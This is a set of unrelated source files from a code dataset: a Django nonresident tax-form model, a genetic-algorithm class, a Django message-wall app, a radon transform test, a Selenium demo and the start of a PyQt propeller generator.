models.CharField(max_length=128, null=True)\n INFOL15 = models.CharField(max_length=128, null=True)\n INFOL16 = models.CharField(max_length=128, null=True)\n \n def __unicode__(self):\n return self.INFOL01 + \" \" + self.INFOL02\n \nclass modelSummary(models.Model):\n SUMMARY01 = models.CharField(\"Filing Status\", default=\"\", max_length=128)\n SUMMARY02 = models.IntegerField(\"Gross Income\", default=0)\n SUMMARY03 = models.IntegerField(\"Deductions:\", default=0)\n SUMMARY03a = models.IntegerField(\"Tax treaty exemption:\", default=0)\n SUMMARY03aa = models.CharField(\"country\", default=\"Hong Kong\", max_length=128)\n SUMMARY03b = models.IntegerField(\"Personal exemption\", default=0)\n SUMMARY03c = models.IntegerField(\"State and local income taxes\", default=0)\n SUMMARY03d = models.IntegerField(\"Student loan interest\", default=0)\n SUMMARY03e = models.IntegerField(\"Scholarship and fellowship grants\", default=0)\n SUMMARY04 = models.IntegerField(\"Taxable Income\", default=0)\n SUMMARY05 = models.IntegerField(\"Tax\", default=0)\n SUMMARY06 = models.IntegerField(\"Other taxes: Unreported social security and Medicare tax\", default=0)\n SUMMARY07 = models.IntegerField(\"Total Taxes\", default=0)\n SUMMARY08 = models.IntegerField(\"Tax payments and credit\", default=0)\n SUMMARY09a = models.IntegerField(\"Tax Refundable\", default=0)\n SUMMARY09b = models.IntegerField(\"Tax Due\", default=0)\n\nclass modelPostTaxInput(models.Model):\n\n # Schedule OI fields\n SCHOILA = models.CharField(\"A. Of what country or countries were you a citizen or national during the tax year?\", default=\"\", max_length=128, blank=True, null=True)\n SCHOILB = models.CharField(\"B. In what country did you claim residence for tax purposes during the tax year?\", default=\"\", max_length=128, blank=True, null=True) \n SCHOILC = models.BooleanField(\"C. Have you ever applied to be a green card holder (lawful permanent resident) of the United States?\", default=False)\n SCHOILD1 = models.BooleanField(\"A U.S. citizen?\", default=False)\n SCHOILD2 = models.BooleanField(\"A green card holder (lawful permanent resident) of the United States?\", default=False)\n SCHOILE = models.CharField(\"E. If you had a visa on the last day of the tax year, enter your visa type. If you did not have a visa, enter your U.S. immigration status on the last day of the tax year.\", default=\"\", max_length=128, blank=True, null=True)\n SCHOILF = models.BooleanField(\"F. Have you ever changed your visa type (nonimmigrant status) or U.S. immigration status?\", default=False)\n SCHOILFc = models.CharField(\"If you answered 'Yes,' indicate the date and nature of the change.\", default=\"\", max_length=128, blank=True, null=True)\n SCHOILGa = models.BooleanField(\"Canada\", default=False)\n SCHOILGb = models.BooleanField(\"Mexico\", default=False)\n SCHOILGc = models.DateField(\"Date entered United States (mm/dd/yy)\", blank=True, null=True)\n SCHOILGd = models.DateField(\"Date departed United States (mm/dd/yy)\", blank=True, null=True)\n SCHOILHa = models.IntegerField(\"2011\", default=0)\n SCHOILHb = models.IntegerField(\"2012\", default=0)\n SCHOILHc = models.IntegerField(\"and 2013\", default=0)\n SCHOILI = models.BooleanField(\"I. Did you file a U.S. income tax return for any prior year?\", default=False)\n SCHOILIc = models.CharField(\"If 'Yes,' give the latest year and form number you filed\", default=\"\", max_length=128, blank=True, null=True)\n \n # F8843 fields\n F8843L01A = models.CharField(\"1a. Type of U.S. visa (for example, F, J, M, Q, etc.) and date you entered the United States\", default=\"\", max_length=128, blank=True, null=True)\n F8843L01B = models.CharField(\"1b. Current nonimmigrant status and date of change (see instructions)\", default=\"\", max_length=128, blank=True, null=True)\n F8843L02 = models.CharField(\"2. Of what country were you a citizen during the tax year?\", default=\"\", max_length=128, blank=True, null=True)\n F8843L03A = models.CharField(\"3a. What country issued you a passport?\", default=\"\", max_length=128, blank=True, null=True)\n F8843L03B = models.CharField(\"3b. Enter your passport number\", default=\"\", max_length=128, blank=True, null=True)\n\n F8843L04Aa = models.IntegerField(\"2013\", default=0, blank=True, null=True)\n F8843L04Ab = models.IntegerField(\"2012\", default=0, blank=True, null=True)\n F8843L04Ac = models.IntegerField(\"2011\", default=0, blank=True, null=True)\n F8843L04B = models.IntegerField(\"4b. Enter the number of days in 2013 you claim you can exclude for purposes of the substantial presence test\", default=0, blank=True, null=True)\n\n F8843Teachers = models.BooleanField(\"Teachers and Trainees (Visa J or Q)\", default=False)\n F8843TeachersL05 = models.CharField(\"5. For teachers, enter the name, address, and telephone number of the academic institution where you taught in 2013\", default=\"\", max_length=128, blank=True, null=True)\n F8843TeachersL06 = models.CharField(\"6. For trainees, enter the name, address, and telephone number of the director of the academic or other specialized program you participated in during 2013\", default=\"\", max_length=128, blank=True, null=True)\n F8843TeachersL07a = models.CharField(\"2007\", default=\"\", max_length=128, blank=True, null=True)\n F8843TeachersL07b = models.CharField(\"2008\", default=\"\", max_length=128, blank=True, null=True)\n F8843TeachersL07c = models.CharField(\"2009\", default=\"\", max_length=128, blank=True, null=True)\n F8843TeachersL07d = models.CharField(\"2010\", default=\"\", max_length=128, blank=True, null=True)\n F8843TeachersL07e = models.CharField(\"2011\", default=\"\", max_length=128, blank=True, null=True)\n F8843TeachersL07f = models.CharField(\"2012\", default=\"\", max_length=128, blank=True, null=True)\n F8843TeachersL08 = models.BooleanField(\"8. Were you present in the United States as a teacher, trainee, or student for any part of 2 of the 6 prior calendar years (2007 through 2012)?\", default=False)\n\n F8843Students = models.BooleanField(\"Students (Visa F, J, M, or Q)\", default=False)\n F8843StudentsL09 = models.CharField(\"9. Enter the name, address, and telephone number of the academic institution you attended during 2013\", default=\"\", max_length=128, blank=True, null=True)\n F8843StudentsL10 = models.CharField(\"10. Enter the name, address, and telephone number of the director of the academic or other specialized program you participated in during 2013\", default=\"\", max_length=128, blank=True, null=True)\n F8843StudentsL11a = models.CharField(\"2007\", default=\"\", max_length=128, blank=True, null=True)\n F8843StudentsL11b = models.CharField(\"2008\", default=\"\", max_length=128, blank=True, null=True)\n F8843StudentsL11c = models.CharField(\"2009\", default=\"\", max_length=128, blank=True, null=True)\n F8843StudentsL11d = models.CharField(\"2010\", default=\"\", max_length=128, blank=True, null=True)\n F8843StudentsL11e = models.CharField(\"2011\", default=\"\", max_length=128, blank=True, null=True)\n F8843StudentsL11f = models.CharField(\"2012\", default=\"\", max_length=128, blank=True, null=True)\n F8843StudentsL12 = models.BooleanField(\"12. Were you present in the United States as a teacher, trainee, or student for any part of more than 5 calendar years?\", default=False)\n F8843StudentsL13 = models.BooleanField(\"13. During 2013, did you apply for, or take other affirmative steps to apply for, lawful permanent resident status\", default=False)\n F8843StudentsL14 = models.CharField(\"14. If you checked the 'Yes' box on line 13, explain\", default=\"\", max_length=128, blank=True, null=True)\n \n F8843Athletes = models.BooleanField(\"Professional Athletes\", default=False)\n F8843AthletesL15 = models.CharField(\"15. Enter the name of the charitable sports event(s) in the United States in which you competed during 2013 and the dates of competition\", default=\"\", max_length=128, blank=True, null=True)\n F8843AthletesL16 = models.CharField(\"16. Enter the name(s) and employer identification number(s) of the charitable organization(s) that benefited from the sports event(s)\", default=\"\", max_length=128, blank=True, null=True)\n F8843AthletesL16a = models.BooleanField(\"16a. Note. You must attach a statement to verify that all of the net proceeds of the sports event(s) were contributed to the charitable organization(s) listed on line 16.\", default=False)\n \n F8843Medical = models.BooleanField(\"Individuals With a Medical Condition or Medical Problem\", default=False)\n F8843MedicalL17A = models.CharField(\"17a. Describe the medical condition or medical problem that prevented you from leaving the United States\", default=\"\", max_length=128, blank=True, null=True)\n F8843MedicalL17B = models.CharField(\"17b Enter the date you intended to leave the United States prior to the onset of the medical condition or medical problem described on line 17a\", default=\"\", max_length=128, blank=True, null=True)\n F8843MedicalL17C = models.DateField(\"17c. Enter the date you actually left the United States\", blank=True, null=True)\n F8843MedicalL18a = models.CharField(\"I certify that:\", default=\"\", max_length=128, blank=True, null=True)\n F8843MedicalL18b = models.CharField(\"Name of physician or other medical official\", default=\"\", max_length=128, blank=True, null=True)\n F8843MedicalL18c = models.CharField(\"Physician's or other medical official's address and telephone number\", default=\"\", max_length=128, blank=True, null=True)\n \n # INFO fields\n INFOL04 = models.CharField(\"Number, street, and apt. no., or rural route (If you have a P.O. box, enter Box Number only)\", max_length=128, blank=True, null=True)\n INFOL05 = models.CharField(\"City, town or post office, state, and ZIP code.\", max_length=128, blank=True, null=True)\n INFOL06 = models.CharField(\"Foreign country name\", max_length=128, blank=True, null=True)\n INFOL07 = models.CharField(\"Foreign province/state/county\", max_length=128, blank=True, null=True)\n INFOL08 = models.CharField(\"Foreign postal code\", max_length=128, blank=True, null=True)\n INFOL09 = models.BooleanField(default=False)\n INFOL10 = models.CharField(\"Designee's name\", max_length=128, blank=True, null=True)\n INFOL11 = models.CharField(\"Phone no.\", max_length=128, blank=True, null=True)\n INFOL12 = models.CharField(\"Personal identification number (PIN) \", max_length=128, blank=True, null=True)\n INFOL15 = models.CharField(\"Enter your reponse here:\", max_length=128, blank=True, null=True)\n INFOL16 = models.CharField(\"Enter your reponse here:\", max_length=128, blank=True, null=True)\n\nclass modelF8843(models.Model):\n # F8843 fields\n F8843L01A = models.CharField(\"Type of U.S. visa (for example, F, J, M, Q, etc.) and date you entered the United States\", default=\"\", max_length=128)\n F8843L01B = models.CharField(\"Current nonimmigrant status and date of change (see instructions)\", default=\"\", max_length=128)\n F8843L02 = models.CharField(\"Of what country were you a citizen during the tax year?\", default=\"\", max_length=128)\n F8843L03A = models.CharField(\"What country issued you a passport?\", default=\"\", max_length=128)\n F8843L03B = models.CharField(\"Enter your passport number\", default=\"\", max_length=128)\n F8843L04Aa = models.IntegerField(\"2013\", default=0)\n F8843L04Ab = models.IntegerField(\"2012\", default=0)\n F8843L04Ac = models.IntegerField(\"2011\", default=0)\n F8843L04B = models.IntegerField(\"Enter the number of days in 2013 you claim you can exclude for purposes of the substantial presence test\", default=0)\n F8843L05 = models.CharField(\"For teachers, enter the name, address, and telephone number of the academic institution where you taught in 2013\", default=\"\", max_length=128)\n F8843L06 = models.CharField(\"For trainees, enter the name, address, and telephone number of the director of the academic or other specialized program you participated in during 2013\", default=\"\", max_length=128)\n F8843L07a = models.CharField(\"2007\", default=\"\", max_length=128)\n F8843L07b = models.CharField(\"2008\", default=\"\", max_length=128)\n F8843L07c = models.CharField(\"2009\", default=\"\", max_length=128)\n F8843L07d = models.CharField(\"2010\", default=\"\", max_length=128)\n F8843L07e = models.CharField(\"2011\", default=\"\", max_length=128)\n F8843L07f = models.CharField(\"2012\", default=\"\", max_length=128)\n F8843L08 = models.BooleanField(\"Were you present in the United States as a teacher, trainee, or student for any part of 2 of the 6 prior calendar years (2007 through 2012)?\", default=False)\n F8843L09 = models.CharField(\"Enter the name, address, and telephone number of the academic institution you attended during 2013\", default=\"\", max_length=128)\n F8843L10 = models.CharField(\"Enter the name, address, and telephone number of the director of the academic or other specialized program you participated in during 2013\", default=\"\", max_length=128)\n F8843L11a = models.CharField(\"2007\", default=\"\", max_length=128)\n F8843L11b = models.CharField(\"2008\", default=\"\", max_length=128)\n F8843L11c = models.CharField(\"2009\", default=\"\", max_length=128)\n F8843L11d = models.CharField(\"2010\", default=\"\", max_length=128)\n F8843L11e = models.CharField(\"2011\", default=\"\", max_length=128)\n F8843L11f = models.CharField(\"2012\", default=\"\", max_length=128)\n F8843L12 = models.BooleanField(\"Were you present in the United States as a teacher, trainee, or student for any part of more than 5 calendar years?\", default=False)\n F8843L13 = models.BooleanField(\"During 2013, did you apply for, or take other affirmative steps to apply for, lawful permanent resident status\", default=False)\n F8843L14 = models.CharField(\"If you checked the 'Yes' box on line 13, explain\", default=\"\", max_length=128)\n F8843L15 = models.CharField(\"Enter the name of the charitable sports event(s) in the United States in which you competed during 2013 and the dates of competition\", default=\"\", max_length=128)\n F8843L16 = models.CharField(\"Enter the name(s) and employer identification number(s) of the charitable organization(s) that benefited from the sports event(s)\", default=\"\", max_length=128)\n F8843L16a = models.BooleanField(\"Note. You must attach a statement to verify that all of the net proceeds of the sports event(s) were contributed to the charitable organization(s) listed on line 16.\", default=False)\n F8843L17A = models.CharField(\"Describe the medical condition or medical problem that prevented you from leaving the United States\", default=\"\", max_length=128)\n F8843L17B = models.CharField(\"Enter the date you intended to leave the United States prior to the onset of the medical condition or medical problem described on line 17a\", default=\"\", max_length=128)\n F8843L17C = models.DateField(\"Enter the date you actually left the United States\", null=True)\n F8843L18a = models.CharField(\"Physician's Statement:\", default=\"\", max_length=128)\n F8843L18b = models.CharField(\"Name of physician or other medical official\", default=\"\", max_length=128)\n F8843L18c = models.CharField(\"Physician's or other medical official's address and telephone number\", default=\"\", max_length=128)\n\nclass modelInput(models.Model):\n \n # text input\n A01 = models.CharField(\"First Name\", max_length=128, blank=True, null=True)\n A02 = models.CharField(\"Last Name\", max_length=128, blank=True, null=True)\n \n # choose one\n CHOICES_Q01 = ((\"a\", \"Current Year\"), (\"b\", \"Prior Year(s)\"),)\n Q01 = models.CharField(\"Please select tax year\", max_length=128, choices = CHOICES_Q01, blank=True, null = True)\n \n # choose one\n CHOICES_Q01_01 = ((\"a\", \"2010\"), (\"b\", \"2011\"), (\"c\", \"2012\"),)\n Q01_01 = models.CharField(\"Please select a prior tax year\", max_length=128, choices = CHOICES_Q01_01, blank=True, null = True)\n \n # choose one\n CHOICES_Q02 = ((\"a\", \"Nonresident Tax Return\"), (\"b\", \"Social Security & Medicare Tax Refunds\"),)\n Q02 = models.CharField(\"Please select your service need:\", max_length=128, choices = CHOICES_Q02, blank=True, null = True)\n\t\n # choose one\n CHOICES_Q02_01 = ((\"a\", \"China\"), (\"b\", \"Mexico\"),)\n Q02_01 = models.CharField(\"Please select your country of origin: \", max_length=128, choices = CHOICES_Q02_01, blank=True, null = True)\n\t\n # read-only\n Q02_01_01 = models.IntegerField(\"Tax Treaty Amount:\", max_length=128, blank=True, null = True)\n\t\n # choose one\n CHOICES_Q03 = ((\"a\", \"1040NR-EZ\"), (\"b\", \"1040NR\"),)\n Q03 = models.CharField(\"Please select your forms:\", max_length=128, choices = CHOICES_Q03, blank=True, null = True)\n\t\n # choose one\n CHOICES_Q03_01 = ((\"a\", \"Single\"), (\"b\", \"Married\"),)\n Q03_01 = models.CharField(\"What do you want to file as?\", max_length=128, choices = CHOICES_Q03_01, blank=True, null = True)\n \n # read-only\n Q03_01_01 = models.IntegerField(\"Personal Exemption:\", max_length=128, blank=True, null = True)\n \n # read-only\n Q03_01_02 = models.IntegerField(\"Standard Deviation:\", max_length=128, blank=True, null = True)\n\n # choose many\n Q04 = models.CharField(\"Please select source of income:\", max_length=128, blank=True, null = True)\n Q04_a = models.BooleanField(\"W2 - check to expand\", max_length=128, default=False)\n Q04_b = models.BooleanField(\"1099G - check to expand\", max_length=128, default=False)\n\n W2L01 = models.IntegerField(\"Box 1: Wages, tips, other comp.\", blank=True, null=True, default=0)\n W2L02 = models.IntegerField(\"Box 2: Federal income tax withheld\", blank=True, null=True, default=0)\n W2L03 = models.IntegerField(\"Box 3: Social security wages\", blank=True, null=True, default=0)\n W2L04 = models.IntegerField(\"Box 4: Social security tax withheld\", blank=True, null=True, default=0)\n W2L05 = models.IntegerField(\"Box 5: Medicare wages and tips\", blank=True, null=True, default=0)\n W2L06 = models.IntegerField(\"Box 6: Medicare tax withheld\", blank=True, null=True, default=0)\n W2L12aB = models.IntegerField(\"Box 12a: Enter code and amount\", blank=True, null=True, default=0)\n W2L12bB = models.IntegerField(\"Box 12b: Enter code and amount\", blank=True, null=True, default=0)\n W2L15aA = models.IntegerField(\"Box 15a: State\", blank=True, null=True, default=0)\n W2L15bA = models.IntegerField(\"Box 15b: Employer's state ID number\", blank=True, null=True, default=0)\n W2L16A = models.IntegerField(\"Box 16: State wages, tips, etc.\", blank=True, null=True, default=0)\n W2L17A = models.IntegerField(\"Box 17: State income tax\", blank=True, null=True, default=0)\n W2L18A = models.IntegerField(\"Box 18: Local wages, tips, etc.\", blank=True, null=True, default=0)\n W2L19A = models.IntegerField(\"Box 19: Local income tax\", blank=True, null=True, default=0)\n W2L20A = models.IntegerField(\"Box 20: Locality name\", blank=True, null=True, default=0)\n W2L07 = models.IntegerField(\"Box 7: Social security tips\", blank=True, null=True, default=0)\n W2L08 = models.IntegerField(\"Box 8: Allocated tips\", blank=True, null=True, default=0)\n W2L10 = models.IntegerField(\"Box 10: Dependent care benefits\", blank=True, null=True, default=0)\n W2L11 = models.IntegerField(\"Box 11: Nonqualified plans\", blank=True, null=True, default=0)\n W2L14 = models.IntegerField(\"Box 14: Other\", blank=True, null=True, default=0)\n\n F1099GL01 = models.IntegerField(\"Box 1: Unemployment compensation OR Recipient's identification number:\", blank=True, null=True, default=0)\n F1099GL02 = models.IntegerField(\"Box 2: State or local income tax refunds, credits, or offsets\", blank=True, null=True, default=0)\n F1099GL03 = models.IntegerField(\"Box 3: Box 2 amount is for tax year\", blank=True, null=True, default=0)\n F1099GL04 = models.IntegerField(\"Box 4: Federal income tax withheld\", blank=True, null=True, default=0)\n F1099GL05 = models.IntegerField(\"Box 5: RTAA payments\", blank=True, null=True, default=0)\n F1099GL06 = models.IntegerField(\"Box 6: Taxable grants\", blank=True, null=True, default=0)\n F1099GL07 = models.IntegerField(\"Box 7: Agriculture payments\", blank=True, null=True, default=0)\n F1099GL08 = models.IntegerField(\"Box 8: Check if box 2 is trade or business\", blank=True, null=True, default=0)\n F1099GL09 = models.IntegerField(\"Box 9: Market Gain\", blank=True, null=True, default=0)\n F1099GL10aA = models.IntegerField(\"Box 10a: State\", blank=True, null=True, default=0)\n F1099GL10bA = models.IntegerField(\"Box 10b: State identification no.\", blank=True, null=True, default=0)\n F1099GL11A = models.IntegerField(\"Box 11: State income tax withheld\", blank=True, null=True, default=0)\n\n Q05_scholarship = models.IntegerField(\"Scholarship and fellowship grants excluded\", blank = True, null = True)\n Q05_student_loan = models.IntegerField(\"Student loan interest paid in current year and amount?\", blank = True, null = True)\n Q06_4137_8919 = models.IntegerField(\"Unreported social security and Medicare tax (4137/ 8919)\", blank = True, null = True)\n Q06_estimated_tax = models.IntegerField(\"2013 estimated tax payments and amount applied from 2012 return\", blank = True, null = True)\n Q06_1040C = models.IntegerField(\"Credit for amount paid with Form 1040-C\", blank = True, null = True)\n \n \n def __unicode__(self):\n return self.A01 + \" \" + self.A02\n \n ","sub_path":"app1040nrezlocal/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":26663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"443351852","text":"from Genotype import Genotype\nfrom Line import Line\nimport copy\n\nclass LineGenotype(Genotype):\n\n def __init__(self,n_genes=4,n_bases=False,genes=False,name=\"0.0\"):\n Genotype.__init__(self,n_genes=n_genes,n_bases=n_bases,genes=genes,name=name)\n\n def breed(self,mate,mutation_chance=1.):\n genes = []\n assert len(self.genes) == len(mate.genes), \"Mismatched number of genes, self: %i, mate: %i\"%(len(self.genes),len(mate.genes))\n for i in range(len(self.genes)):\n if (self.random() < mutation_chance): genes.append(copy.copy(self.genes[i]))\n else: genes.append(copy.copy(mate.genes[i]))\n offspring = LineGenotype(genes=genes)\n offspring.numerical_mutate()\n return offspring\n\n def eval(self):\n return Line(int(self.genes[0].code, 2),\n int(self.genes[1].code, 2),\n int(self.genes[2].code, 2),\n int(self.genes[3].code, 2),\n name=self.name)\n\n def to_string(self):\n to_return = \"(x1: %i, y1: %i), (x2: %i, y2: %i)\"%\\\n (int(self.genes[0].code, 2),int(self.genes[1].code, 2),int(self.genes[2].code, 2),int(self.genes[3].code, 2))\n return to_return\n","sub_path":"code/04/LineGenotype.py","file_name":"LineGenotype.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"53462198","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .models import Users, Messages, Comments\n\n# Create your views here.\ndef index(request):\n if 'users_id' not in request.session:\n request.session['users_id'] = []\n return render(request, \"main/index.html\")\n\ndef signup(request):\n return render(request, 'main/signup.html')\n\ndef login(request):\n if request.method == \"POST\":\n models_response = Users.objects.login_check(request.POST)\n if not models_response[0]:\n for error in models_response[1]:\n messages.error(request, error)\n return redirect('main:index')\n else:\n user = {\n \"id\": models_response[1].id,\n }\n return redirect('/wall/{}'.format(user['id']))\n\ndef create(request):\n if request.method == \"POST\":\n models_response = Users.objects.create_check(request.POST)\n if not models_response[0]:\n for error in models_response[1]:\n messages.error(request, error)\n return redirect('main:signup')\n else:\n user = {\n \"id\": models_response[1].id,\n }\n return redirect('/wall/{}'.format(user['id']))\n\ndef wall(request, current_id):\n #adding user id to logged users list\n if current_id not in request.session['users_id']:\n request.session['users_id'].append(current_id)\n current_user = Users.objects.get(id=current_id)\n context = {\n \"user\": \"{}\".format(current_user.first_name),\n \"id\": current_id,\n \"all_messages\": Messages.objects.all().order_by('created_at'),\n \"all_comments\": Comments.objects.all().order_by('created_at'),\n }\n return render(request, 'main/wall.html', context)\n\ndef post_message(request, current_id):\n if request.method == \"POST\":\n models_response = Messages.objects.message_check(request.POST)\n if not models_response[0]:\n for error in models_response[1]:\n messages.error(request, error)\n return redirect('/wall/{}'.format(request.POST['user_id']))\n\ndef post_comment(request, current_id):\n if request.method == \"POST\":\n models_response = Comments.objects.comment_check(request.POST)\n if not models_response[0]:\n for error in models_response[1]:\n messages.error(request, error)\n return redirect('/wall/{}'.format(request.POST['user_id']))\n\ndef logout(request, current_id):\n if current_id in request.session['users_id']:\n request.session['users_id'].remove(current_id)\n return redirect('main:index')\n","sub_path":"Django/TheWall/apps/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"501739846","text":"import matplotlib.pyplot as plt\nimport tomopy\nimport numpy as np\nimport radonusfft\nN = 128\nNtheta = 128\nNs = 16\ntheta = np.float32(np.arange(0, Ntheta)*np.pi/Ntheta)\n\n\n# create class for the transform\ncl = radonusfft.radonusfft(Ntheta, Ns, N)\ncl.setobj(theta)\n# swig does not work with complex numbers, so array sizes are doubled 2*N\nf = np.zeros([Ns, N, N], dtype=\"complex64\")\n\n# real part\nf[:] = tomopy.misc.phantom.shepp2d(size=N, dtype=u'float32')+1j*np.fliplr(\n tomopy.misc.phantom.shepp2d(size=N, dtype=u'float32'))\n\n# fwd\n# memory for result\ng = np.zeros([Ntheta, Ns, N], dtype=\"complex64\")\n# run\ncl.fwd(g, f)\n\n# adj\n# memory for result\nff = np.zeros([Ns, N, N], dtype=\"complex64\")\n# run\ncl.adj(ff, g)\n\nf = np.complex128(f)\nff = np.complex128(ff)\ng = np.complex128(g)\n\n\n# adj test\nprint((np.sum(f*np.conj(ff))-np.sum(g*np.conj(g)))/np.sum(f*np.conj(ff)))\n\n\nplt.subplot(2, 2, 1)\nplt.imshow(np.squeeze(g[:, 4, :].real))\nplt.subplot(2, 2, 2)\nplt.imshow(np.squeeze(g[:, 4, :].imag))\n\nplt.subplot(2, 2, 3)\nplt.imshow(np.squeeze(ff[4, :, :].real))\nplt.subplot(2, 2, 4)\nplt.imshow(np.squeeze(ff[4, :, :].imag))\n\nplt.show()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"478892323","text":"# -*- coding: utf-8 -*-\n#COMECE AQUI ABAIXO\nn = 0\nfor j in range (10, 100, 1):\n n=n+1\n \nif 1==2:\n visual = [[' ',' ', ' '], [' ', ' ',' '], [' ', ' ', ' ']] \n #for i in range(0, 10, 1):\n a = str(input('Selecione a posição: '))\n if i%2==0:\n visual[int(a[0])][int(a[2])]='X'\n else: \n visual[int(a[0])][int(a[2])]='O'\n for i in range (0, 3, 1):\n print(str(visual[i][0]) + ' | '+ str(visual[i][1]) + ' | '+ str(visual[i][2]))","sub_path":"moodledata/vpl_data/380/usersdata/308/85650/submittedfiles/testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"333962445","text":"\n\n#calss header\nclass _POCKET():\n\tdef __init__(self,): \n\t\tself.name = \"POCKET\"\n\t\tself.definitions = [u'to put something into your pocket: ', u'to hit a billiard or snooker ball into a pocket: ', u'to take something for yourself, especially dishonestly: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_pocket.py","file_name":"_pocket.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"65534770","text":"#!/usr/bin/env python2.7\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom time import sleep\n\n# geckodriver não precisa estar definido no path\ndriver = webdriver.Firefox(executable_path='/opt/geckodriver/geckodriver')\ndriver.get(\"http://www.python.org\")\nassert \"Python\" in driver.title\nelem = driver.find_element_by_name(\"q\")\nelem.clear()\nelem.send_keys(\"pycon\")\nsleep(2)\nelem.send_keys(Keys.RETURN)\nassert \"No results found.\" not in driver.page_source\ndriver.close()","sub_path":"simple-usage.py","file_name":"simple-usage.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"225043255","text":"from app import BasicApp\nfrom formula import Formula\n\nglobal string, i\n\ndef main():\n summ=0\n string = str(input('Ввод: '))\n string = string.split('--poly=')\n string = string[1].split(',')\n push=BasicApp(string, summ)\n push.run()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"OOP Files/Polynoms #3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"8810099","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 30 12:47:12 2020\r\n\r\n@author: Kai Jungsthöfel & Lars Schröder\r\n\"\"\"\r\nimport vtkplotlib as vpl\r\nfrom stl.mesh import Mesh\r\nimport numpy as np\r\nimport stl\r\nfrom stl import mesh\r\nimport math\r\nimport os\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLineEdit, QFileDialog, QCheckBox, QDialog\r\nfrom os.path import expanduser\r\n\r\n\r\n\r\n\r\n\r\nclass Ui_MainWindow(object):\r\n def setupUi(self, MainWindow):\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.setFixedSize(1011, 480)\r\n self.centralwidget = QtWidgets.QWidget(MainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n \r\n self.pushButtonGenerate = QtWidgets.QPushButton(self.centralwidget)\r\n self.pushButtonGenerate.setGeometry(QtCore.QRect(40, 210, 75, 23))\r\n self.pushButtonGenerate.setObjectName(\"pushButtonGenerate\")\r\n \r\n self.pushButtonExport = QtWidgets.QPushButton(self.centralwidget)\r\n self.pushButtonExport.setGeometry(QtCore.QRect(150, 210, 75, 23))\r\n self.pushButtonExport.setObjectName(\"pushButtonExport\")\r\n \r\n self.pushButtonDialog = QtWidgets.QPushButton(self.centralwidget)\r\n self.pushButtonDialog.setGeometry(QtCore.QRect(165, 440, 30, 20))\r\n self.pushButtonDialog.setObjectName(\"pushButtonDialog\")\r\n \r\n self.widget = QtWidgets.QWidget(self.centralwidget)\r\n self.widget.setGeometry(QtCore.QRect(32, 42, 209, 151))\r\n self.widget.setObjectName(\"widget\")\r\n \r\n self.formLayout = QtWidgets.QFormLayout(self.widget)\r\n self.formLayout.setContentsMargins(0, 0, 0, 0)\r\n self.formLayout.setObjectName(\"formLayout\")\r\n \r\n self.labelPropellerVariablen = QtWidgets.QLabel(self.widget)\r\n font = QtGui.QFont()\r\n font.setPointSize(12)\r\n self.labelPropellerVariablen.setFont(font)\r\n self.labelPropellerVariablen.setObjectName(\"labelPropellerVariablen\")\r\n \r\n self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.labelPropellerVariablen)\r\n self.labelL = QtWidgets.QLabel(self.widget)\r\n self.labelL.setObjectName(\"labelL\")\r\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.labelL)\r\n \r\n self.spinBoxL = QtWidgets.QSpinBox(self.widget)\r\n self.spinBoxL.setMinimum(20)\r\n self.spinBoxL.setMaximum(1000)\r\n self.spinBoxL.setSingleStep(10)\r\n self.spinBoxL.setProperty(\"value\", 100)\r\n self.spinBoxL.setObjectName(\"spinBoxL\")\r\n self.spinBoxL.setToolTip(\"Length of one propeller blade, whole propeller is double the size.\")\r\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.spinBoxL)\r\n \r\n self.labelLg = QtWidgets.QLabel(self.widget)\r\n self.labelLg.setObjectName(\"labelLg\")\r\n self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.labelLg)\r\n \r\n self.spinBoxLg = QtWidgets.QSpinBox(self.widget)\r\n self.spinBoxLg.setMaximum(1000)\r\n self.spinBoxLg.setProperty(\"value\", 10)\r\n self.spinBoxLg.setObjectName(\"spinBoxLg\")\r\n \r\n self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.spinBoxLg)\r\n \r\n self.labelKv = QtWidgets.QLabel(self.widget)\r\n self.labelKv.setObjectName(\"labelKv\")\r\n self.formLayout.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.labelKv)\r\n \r\n self.spinBoxKv = QtWidgets.QSpinBox(self.widget)\r\n self.spinBoxKv.setMinimum(100)\r\n 